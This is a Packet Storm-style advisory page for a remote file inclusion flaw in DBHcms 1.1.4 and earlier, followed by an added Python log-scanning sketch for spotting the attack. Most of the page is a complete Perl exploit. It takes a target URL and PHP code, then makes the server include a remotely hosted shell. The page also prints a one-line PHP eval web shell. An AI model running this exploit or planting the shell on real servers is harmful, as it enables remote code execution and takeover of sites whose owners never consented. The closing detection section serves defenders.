dbhcms-rfi.txt

Date: 26 Feb 2008 | Reported by: Ironfist | Type: packetstorm | Source: packetstormsecurity.com

DBHcms <= 1.1.4 remote file inclusion exploit. Vendor URL: www.drbenhur.com. Because the request uses POST, the exploit is hard (though possible) to execute through a browser. Shell: `<?php if(!empty($_GET['do'])){eval($_GET['do']);}?>`. Example target URL: http://www.target.com/dhbcms/

Code
```perl
#!/usr/bin/perl
# DBHcms <= 1.1.4 Remote File Inclusion exploit
# Vendor url: www.drbenhur.com
#
# exploit is hard to execute through a browser -possible though- since it's with POST
# ~Iron
# http://www.randombase.com
require LWP::UserAgent;
#Shell:
# <?php if(!empty($_GET['do'])){eval($_GET['do']);}?>
$shell_url = "http://localhost/s.txt";

print "#
# DBHcms <= 1.1.4 Remote File Inclusion exploit
# By Iron - randombase.com
# Greets to everyone at RootShell Security Group
#
# Example target url: http://www.target.com/dhbcms/
Target url?";
chomp($target=<stdin>);
if($target !~ /^http:\/\//)
{
    $target = "http://".$target;
}
if($target !~ /\/$/)
{
    $target .= "/";
}
print "PHP code to evaluate? ";
chomp($code=<stdin>);
$code =~ s/(<\?php|\?>|<\?)//ig;
$target .= "dbhcms/mod/mod.extmanager.php?do=".$code;

$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;

$response = $ua->post($target,
{
    'extmanager_install' => $shell_url.'?'
});

if ($response->is_success)
{
    print "\n"."#" x 20 ."\n";
    if($response->content =~ /URL file-access/)
    {
        print 'Exploit failed';
    }
    else
    {
        print $response->content;
    }
    print "\n"."#" x 20 ."\n";
}
else
{
    die "Error: ".$response->status_line;
}
```
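For defenders, the request shape used above (a POST to `dbhcms/mod/mod.extmanager.php` carrying a `do` query parameter) is visible in web access logs. The following detection sketch is an added example, not part of the original advisory or the exploit author's code; it assumes the Apache/nginx "combined" log format, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" access-log format (assumed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) '
)
# Script path as requested by the exploit on this page.
VULN_SCRIPT = "/dbhcms/mod/mod.extmanager.php"

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '198.51.100.7 - - [26/Feb/2008:10:01:02 +0000] "POST /dbhcms/mod/mod.extmanager.php?do=echo%201%3B HTTP/1.1" 200 5120 "-" "libwww-perl/5.808"',
    '192.0.2.10 - - [26/Feb/2008:10:02:00 +0000] "GET /dbhcms/index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [26/Feb/2008:10:03:00 +0000] "GET /dbhcms/mod/mod.extmanager.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
]

def classify(method, uri):
    """Return (severity, reason), or None if the request is not relevant."""
    parts = urlsplit(uri)
    if not parts.path.lower().endswith(VULN_SCRIPT):
        return None
    has_do = "do" in parse_qs(parts.query, keep_blank_values=True)
    # extmanager_install travels in the POST body (not logged); the code for
    # the included shell travels in the "do" query parameter (logged).
    if method == "POST" and has_do:
        return ("high", "POST with do= query, the exploit's request shape")
    if has_do:
        return ("medium", "do= query on the extension manager script")
    return ("low", "direct request to the extension manager script")

def scan(lines):
    """Return (ip, timestamp, status, severity, reason) per relevant line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify(m["method"], m["uri"])
        if verdict:
            hits.append((m["ip"], m["ts"], int(m["status"])) + verdict)
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The `extmanager_install` value is sent in the POST body and will not appear in access logs, so a URL in that field has to be matched by request-body inspection (for example a WAF rule). The exploit's own check for `URL file-access` in the response reflects PHP refusing remote includes when URL file access is disabled in the server configuration.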

Vulners AI Score: 7.4 (High risk)